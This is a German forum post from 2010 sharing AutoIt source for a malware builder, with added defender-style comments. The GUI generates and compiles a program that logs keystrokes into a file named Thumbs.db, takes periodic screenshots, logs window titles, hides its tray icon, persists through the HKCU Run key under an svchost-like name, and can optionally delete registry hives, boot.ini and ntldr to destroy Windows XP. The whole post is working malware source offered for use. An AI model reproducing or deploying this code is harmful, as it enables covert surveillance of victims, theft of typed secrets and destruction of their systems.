
[AutoIt] Codeschnipsel: Builder von Keylogger, Pwd Stealer, ScreenCapture...



Orangen
03.02.2010, 20:25
; Builder front end: lays out a GUI whose options decide which monitoring or
; destructive routines get written into a generated AutoIt script by the event loop
; that follows. Defender view: the labels list the advertised capabilities, but only
; the checkboxes the event loop actually reads produce code in this listing.
#include <GUIConstantsEx.au3>
; Hide the builder's own tray icon.
Opt("TrayIconHide", 1)
$Title1 = "Titel"
$Form1 = GUICreate($Title1, 450, 250)
; Option checkboxes (German labels), in order: log all keystrokes, save screen,
; FTP upload, save FTP data, save Firefox data, save settings in X, save Pidgin data,
; save processes, autostart, copy to directory.
$Checkbox1 = GUICtrlCreateCheckbox("Alle Tastenanschläge speichern", 7, 10, 177, 17)
$Checkbox2 = GUICtrlCreateCheckbox("Bildschirm speichern", 7, 25, 121, 17)
$Checkbox3 = GUICtrlCreateCheckbox("FTP Upload", 7, 40, 81, 17)
$Checkbox4 = GUICtrlCreateCheckbox("FTP Daten speichern", 7, 55, 121, 17)
$Checkbox5 = GUICtrlCreateCheckbox("Firefox Daten speichern", 7, 70, 137, 17)
$Checkbox6 = GUICtrlCreateCheckbox("Einstellungen in X speichern", 7, 85, 153, 17)
$Checkbox7 = GUICtrlCreateCheckbox("Pidgin Daten speichern", 7, 100, 129, 17)
$Checkbox8 = GUICtrlCreateCheckbox("Prozesse speichern", 7, 115, 129, 17)
$Checkbox9 = GUICtrlCreateCheckbox("Autostart", 7, 130, 129, 17)
$Checkbox10 = GUICtrlCreateCheckbox("in Verzeichnis kopieren", 7, 145, 129, 17)
; Destructive option: the label reads "destroy Windows XP by deleting the registry,
; boot.ini, ntldr".
$Checkbox11 = GUICtrlCreateCheckbox("Windows XP durch Löschen der Registry, boot.ini, ntldr zerstören", 7, 220, 250, 17)
; $Checkbox12 is assigned twice ("eject and close drive", then "log file input + hidden
; FileSetAttrib"); after these two lines the variable holds the second control's ID.
$Checkbox12 = GUICtrlCreateCheckbox("Laufwerk ein und auswerfen", 7, 205, 175, 17)
$Checkbox12 = GUICtrlCreateCheckbox("loggdatei input + hidden FileSetAttrib", 7, 235, 175, 17)
; Text fields: a directory default, a default path for the autostart entry, and a drive
; letter. $Input5 is assigned again further down, so later reads see that second control.
$Input5 = GUICtrlCreateInput("C:\WINDOWS\Temp\", 192, 145, 73, 15)
$Input6 = GUICtrlCreateInput(@ScriptDir & "\Xsvchost.exe", 192, 130, 73, 15)
$Input7 = GUICtrlCreateInput("D:\", 192, 205, 15, 15)
$Label9 = GUICtrlCreateLabel("alle ", 232, 205, 17, 17)
$Input8 = GUICtrlCreateInput("10", 252, 205, 19, 15)
$Label10 = GUICtrlCreateLabel(" Sekunden speichern:", 271, 205, 123, 17)
$Label1 = GUICtrlCreateLabel("Prozessname:", 7, 160, 70, 17)
; Build button ("all settings done -> start"); handled as Case $Button1 in the event loop.
$Button1 = GUICtrlCreateButton("Alle Einstellungen erledigt -> Start", 7, 175, 177, 15, 0)
;~ $Label2 = GUICtrlCreateLabel("Speichern unter:", 192, 10, 82, 17)
$Label3 = GUICtrlCreateLabel("alle ", 192, 25, 17, 17)
$Input5 = GUICtrlCreateInput("10", 212, 25, 19, 15)
$Label3 = GUICtrlCreateLabel(" Sekunden ein und auswerfen:", 231, 25, 123, 17)
; FTP server / user name / password fields. Nothing in this listing reads $Input1-$Input3.
$Input1 = GUICtrlCreateInput("FTP Server", 192, 40, 81, 15)
$Input2 = GUICtrlCreateInput("Benutzername", 273, 40, 81, 15)
$Input3 = GUICtrlCreateInput("Passwort", 358, 40, 81, 15)
;~ $Label4 = GUICtrlCreateLabel("Speichern unter:", 192, 55, 82, 17)
;~ $Label5 = GUICtrlCreateLabel("Speichern unter:", 192, 70, 82, 17)
;~ $Label6 = GUICtrlCreateLabel("Speichern unter:", 192, 85, 82, 17)
;~ $Label7 = GUICtrlCreateLabel("Speichern unter:", 192, 100, 82, 17)
; Name of the compiled output, also used as the autostart value name. The default
; resembles the Windows system process name svchost.exe. A process with such a name
; running from a user-writable directory is a useful hunting signal.
$Input4 = GUICtrlCreateInput("Xsvchost.exe", 192, 160, 73, 15)
; If a process with the default name is already running, offer a button whose label
; promises to stop it, remove the autostart entry and delete its files.
If ProcessExists("Xsvchost.exe") Then
$Label8 = GUICtrlCreateLabel($Title1 & " läuft.", 7, 190, 50, 15)
$Button2 = GUICtrlCreateButton("Prozess schließen, Autostart entfernen, Dateien löschen", 58, 190, 280, 15)
Else
; Presumably a placeholder so that $Button2 is defined for the Switch in the event loop.
$Button2 = "123"
EndIf
GUISetState()
; Event loop of the builder. On $Button1 it assembles the text of a second AutoIt script
; in $Au3File1Inhalt, writes it to "Program.au3", compiles it with a bundled Aut2exe.exe
; and starts the result.
; Defender summary of what the generated program can contain, as visible in this listing:
;   - keystroke logging by polling _IsPressed (ATT&CK T1056.001)
;   - periodic screenshots (T1113)
;   - active-window title logging
;   - persistence through the HKCU Run key (T1547.001)
;   - destructive deletion of registry hives and XP boot files
; $Checkbox3-$Checkbox7 and $Checkbox10 (FTP, Firefox, Pidgin, copy to directory) are never
; read in this loop, so no code for those options is generated by this listing.
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
; Continue only if keystroke logging, screenshots, window logging or the destructive
; option is checked (GUICtrlRead returns 1 for a checked box).
If GUICtrlRead($Checkbox1) = 1 Or GUICtrlRead($Checkbox2) = 1 Or GUICtrlRead($Checkbox8) = 1 Or GUICtrlRead($Checkbox11) = 1 Then
$SomethingChanged = 1
Else
$SomethingChanged = 0
MsgBox(0, $Title1, "Keine Einstellungen vorgenommen. Exit.")
EndIf
If $SomethingChanged = 1 Then
; Header of the generated script: includes, plus TrayIconHide so that the generated
; program shows no tray icon either.
$Au3File1Inhalt = '#include <Array.au3>' & @CRLF & _
'#include <Date.au3>' & @CRLF & _
'#include <Process.au3>' & @CRLF & _
'#include <ScreenCapture.au3>' & @CRLF & _
'#include <Misc.au3>' & @CRLF & _
'Opt("TrayIconHide", 1)' & @CRLF
; Window logging: remember the title of the currently active window.
If GUICtrlRead($Checkbox8) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Global $WinActive = WinGetTitle("[active]")' & @CRLF
EndIf
; Persistence: the generated script calls Autostart() once at start-up.
If GUICtrlRead($Checkbox9) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Autostart()' & @CRLF
EndIf
; Destructive option: emits RegDelete calls on registry hive roots and FileDelete calls on
; C:\boot.ini and C:\ntldr. They sit before the generated main loop, so they run as soon
; as the generated program starts.
If GUICtrlRead($Checkbox11) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'RegDelete("HKEY_USERS")' & @CRLF & _
'RegDelete("HKEY_LOCAL_MACHINE")' & @CRLF & _
'FileDelete("C:\boot.ini")' & @CRLF & _
'FileDelete("C:\ntldr")' & @CRLF & _
'RegDelete("HKEY_CURRENT_CONFIG")' & @CRLF
EndIf
; Screenshot timer: the interval is the $Input5 value multiplied by 1000.
If GUICtrlRead($Checkbox2) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Global $timevalue = ' & GUICtrlRead($Input5) * 1000 & @CRLF & _
'$timeinit1 = TimerInit()' & @CRLF
EndIf
; Drive-tray timer: the $Input8 value is inserted as typed.
If GUICtrlRead($Checkbox12) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'$timerinit2 = TimerInit()' & @CRLF & _
'$timer2value = ' & GUICtrlRead($Input8) & @CRLF
EndIf
; Keystroke logging: one-time initialisation call.
If GUICtrlRead($Checkbox1) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & 'Funktion_1_Start()' & @CRLF
EndIf
; Generated main loop: wakes every 10 ms and calls whichever routines were selected.
$Au3File1Inhalt = $Au3File1Inhalt & 'While 1' & @CRLF & _
'Sleep(10)' & @CRLF
If GUICtrlRead($Checkbox1) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & 'Tasten()' & @CRLF
EndIf
If GUICtrlRead($Checkbox8) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & 'Process()' & @CRLF
EndIf
If GUICtrlRead($Checkbox12) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & @CRLF & _
'$timerdiff2 = TimerDiff($timerinit2)' & @CRLF & _
'If $timerdiff2 > $timer2value Then' & @CRLF & _
'$timerinit2 = TimerInit()' & @CRLF & _
'cdfun()' & @CRLF & _
'EndIf' & @CRLF
EndIf
If GUICtrlRead($Checkbox2) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'$timediff1 = TimerDiff($timeinit1)' & @CRLF & _
'If $timediff1 > $timevalue Then' & @CRLF & _
'$timeinit1 = TimerInit()' & @CRLF & _
'ScreenCapture()' & @CRLF & _
'EndIf' & @CRLF
EndIf
$Au3File1Inhalt = $Au3File1Inhalt & _
'WEnd' & @CRLF
; Generated ScreenCapture(): captures the screen and saves it under a relative file name
; of the form "Screen <day>.<month>.<year> <hour>.<min>.<sec>.gif". A growing set of such
; files next to an unknown executable is a host artifact to look for.
If GUICtrlRead($Checkbox2) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func ScreenCapture()' & @CRLF & _
'$Cap= _ScreenCapture_Capture()' & @CRLF & _
'_ScreenCapture_SaveImage("Screen " & @MDAY & "." & @MON & "." & @YEAR & " " & @HOUR & "." & @MIN & "." & @SEC & ".gif",$Cap)' & @CRLF & _
'EndFunc' & @CRLF
EndIf
; Generated cdfun(): opens and closes the tray of the drive given in $Input7.
If GUICtrlRead($Checkbox12) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func cdfun()' & @CRLF & _
'CDTray("' & GUICtrlRead($Input7) & '", "open")' & @CRLF & _
'CDTray("' & GUICtrlRead($Input7) & '", "closed")' & @CRLF & _
'EndFunc' & @CRLF
EndIf
; Generated Process(): when the window title changes, appends a timestamp and the
; previously stored title to $file3, the same log file the keystroke routine writes to.
If GUICtrlRead($Checkbox8) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func Process()' & @CRLF & _
'If $WinActive <> WinGetTitle("") Then' & @CRLF & _
'FileWrite($file3, @CRLF & @CRLF & _NowTime() & @CRLF & $WinActive & @CRLF)' & @CRLF & _
'$WinActive = WinGetTitle("[active]")' & @CRLF & _
'EndIf' & @CRLF & _
'EndFunc ;==>Process' & @CRLF
EndIf
; Generated Autostart(): writes a REG_SZ value to the current user's Run key. The value
; name comes from $Input4 and the data from $Input6. Monitoring writes to Run keys and
; reviewing their entries covers this persistence method.
If GUICtrlRead($Checkbox9) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func Autostart()' & @CRLF & _
'RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run", "' & GUICtrlRead($Input4) & '", "REG_SZ", "' & GUICtrlRead($Input6) & '")' & @CRLF & _
'EndFunc ;==>autostart' & @CRLF
EndIf
; Generated keystroke logger. Funktion_1_Start() sets the log path to "/Thumbs.db" under
; @ScriptDir (presumably named after the Windows thumbnail cache to look harmless), opens
; user32.dll and fills the key-code-to-label tables. Tasten() polls _IsPressed for every
; table entry, appends the label of a pressed key to the log, and waits for its release.
; A "Thumbs.db" containing plain text next to an unknown executable is an indicator.
If GUICtrlRead($Checkbox1) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func Funktion_1_Start()' & @CRLF & _
'$file1 = "/Thumbs.db"' & @CRLF & _
'Global $file3 = @ScriptDir & $file1' & @CRLF & _
'Global $6 = 81' & @CRLF & _
'Global $dll = DllOpen("user32.dll")' & @CRLF & _
'Global $array11[$6]' & @CRLF & _
'$array11[0] = 80' & @CRLF & _
'Global $Array12[$6] = [$6, "{Left Mouse}", "{Right Mouse}", "{Code 3 Unbekannt}", "{MIDDLE MOUSE}", "{X1 mouse button}", "{X2 mouse button}", "{Code 7 Unbekannt}", "{BACKSPACE}", "{TAB}", "{SHIFT}", "{CTRL}", "{ALT}", "{PAUSE}", "{CAPSLOCK}", "Code 15 unbekannt", "Code 16 unbekannt", "Code 17 unbekannt", "Code 18 unbekannt", "Code 19 unbekannt", "{SPACE}", "{PGUP}", "{PGDOWN}", "{END}", "{HOME}", "{LEFT ARROW}", "{UP ARROW}", "{RIGHT ARROW}", "{DOWN ARROW}", "{Code 29 unbekannt}", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "{Code 40: Unbekannt}", "a", "b", "c", "d", "e", "f", "g", "h", "i", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "{F1}", "{F2}", "{F3}", "{F4}", "{F5}", "{F6}", "{F7}", "{F8}", "{F9}", "{F10}", "{Code 80 Unbekannt}"]' & @CRLF & _
'Global $Array13[56][2] = [["4A", "j"],["4B", "k"],["4C", "l"],["4D", "m"],["4E", "n"],["4F", "o"],["5A", "z"],["2A", "{PRINT}"],["2B", "{EXECUTE}"],["2C", "{PRINT SCREEN}"],["2D", "{INS}"],["2E", "{DEL}"],["1B", "{ESC}"],["0C", "{CLEAR}"],["0D", "{ENTER}"],["5B", "{Left Windows}"],["5C", "{Right Windows}"],["6A", "{Multiply}"],["6B", "{Add key}"],["6C", "{pator key}"],["6D", "{Subtract key}"],["6E", "{cal key}"],["6F", "{Divide key}"],["BA", "ü"],["BB", "+"],["BC", ","],["BD", "-"],["BE", "."],["BF", "#"],["C0", "ö"],["DB", "ß"],["DC", "^"],["DD", "´"],["DE", "ä"],["DF", "{Code DF Unbekannt}"],["E2", "<"],["7A", "{F11}"],["7B", "{F12}"],["7C", "{F13}"],["7D", "{F14}"],["7E", "{F15}"],["7F", "{F16}"],["80H", "{F17}"],["81H", "{F18}"],["82H", "[F19}"],["83H", "{F20}"],["84H", "{F21}"],["85H", "{F22}"],["86H", "{F23}"],["87H", "{F24}"],["A0", "{Left SHIFT key}"],["A1", "{Right SHIFT key}"],["A2", "{Left CONTROL key}"],["A3", "{Right CONTROL key}"],["A4", "{Left MENU key}"],["A5", "{Right MENU key}"]]' & @CRLF & _
'For $i = 1 To 80' & @CRLF & _
'$array11[$i] = $i' & @CRLF & _
'Next' & @CRLF & _
'EndFunc ;==>Funktion_1_Start' & @CRLF & _
'Func Tasten()' & @CRLF & _
'For $i = 1 To $array11[0]' & @CRLF & _
'If _IsPressed($array11[$i], $dll) Then' & @CRLF & _
'FileWrite($file3, $Array12[$i])' & @CRLF & _
'EndIf' & @CRLF & _
'While _IsPressed($array11[$i]) = 1' & @CRLF & _
'WEnd' & @CRLF & _
'Next' & @CRLF & _
'For $i = 0 To UBound($Array13, 1) - 1' & @CRLF & _
'If _IsPressed($Array13[$i][0], $dll) Then' & @CRLF & _
'FileWrite($file3, $Array13[$i][1])' & @CRLF & _
'EndIf' & @CRLF & _
'While _IsPressed($Array13[$i][0]) = 1' & @CRLF & _
'WEnd' & @CRLF & _
'Next' & @CRLF & _
'EndFunc ;==>Tasten' & @CRLF
EndIf
; Write the generated source to "Program.au3" in the working directory, replacing any
; earlier copy.
If FileExists("Program.au3") = 1 Then
FileDelete("Program.au3")
EndIf
FileWrite("Program.au3", $Au3File1Inhalt)
; Remove an earlier output file and stop a running process with the output name.
If FileExists(GUICtrlRead($Input4)) = 1 Then
FileDelete(GUICtrlRead($Input4))
EndIf
If ProcessExists(GUICtrlRead($Input4)) Then
ProcessClose(GUICtrlRead($Input4))
EndIf
; Unpack the bundled tool chain into the working directory: upx.exe, the AutoIt compiler
; Aut2exe.exe, its stub AutoItSC.bin and the standard include files. Finding these files
; together in a user directory points to on-host compilation of an AutoIt program.
FileInstall("upx.exe", "upx.exe")
FileInstall("Aut2exe.exe", "Aut2exe.exe")
FileInstall("AutoItSC.bin", "AutoItSC.bin")
FileInstall("Array.au3", "Array.au3")
FileInstall("Date.au3", "Date.au3")
FileInstall("File.au3", "File.au3")
FileInstall("FileConstants.au3", "FileConstants.au3")
FileInstall("FontConstants.au3", "FontConstants.au3")
FileInstall("FTPEx.au3", "FTPEx.au3")
FileInstall("GDIPlus.au3", "GDIPlus.au3")
FileInstall("GDIPlusConstants.au3", "GDIPlusConstants.au3")
FileInstall("Misc.au3", "Misc.au3")
FileInstall("WinAPI.au3", "WinAPI.au3")
FileInstall("WinAPIError.au3", "WinAPIError.au3")
FileInstall("WindowsConstants.au3", "WindowsConstants.au3")
FileInstall("Memory.au3", "Memory.au3")
FileInstall("MemoryConstants.au3", "MemoryConstants.au3")
FileInstall("ScreenCapture.au3", "ScreenCapture.au3")
FileInstall("SendMessage.au3", "SendMessage.au3")
FileInstall("Constants.au3", "Constants.au3")
FileInstall("StructureConstants.au3", "StructureConstants.au3")
FileInstall("ProcessConstants.au3", "ProcessConstants.au3")
FileInstall("Security.au3", "Security.au3")
FileInstall("SecurityConstants.au3", "SecurityConstants.au3")
FileInstall("Process.au3", "Process.au3")
; Compile Program.au3 into an executable named by $Input4 and wait for the compiler.
RunWait("Aut2exe.exe /in Program.au3 /out " & GUICtrlRead($Input4))
; The clean-up of Program.au3 is commented out, so the generated source stays on disk
; and is available as a forensic artifact.
;~ FileDelete("Program.au3")
; Start the compiled program immediately. Run returns 0 on failure, which is reported
; only through an empty message box.
$run = Run(GUICtrlRead($Input4))
If $run = 0 Then
MsgBox(0, "", "")
EndIf
EndIf
; The builder exits after one build attempt, and also after the "no settings" message.
Exit
Case $Button2
; Message text: "process removed - success not certain". The only action taken here is
; ProcessClose on the default process name. The button's label also promises autostart
; removal and file deletion, which this branch does not do, so the Run-key value, the
; log file, the screenshots and the executable must be cleaned up separately.
MsgBox(0, "", "Prozess entfernt - Erfolg nicht sicher")
ProcessClose("Xsvchost.exe")
EndSwitch
WEnd

Codeschnipsel für Leute, die sich schon ein bisschen mit AutoIt auskennen...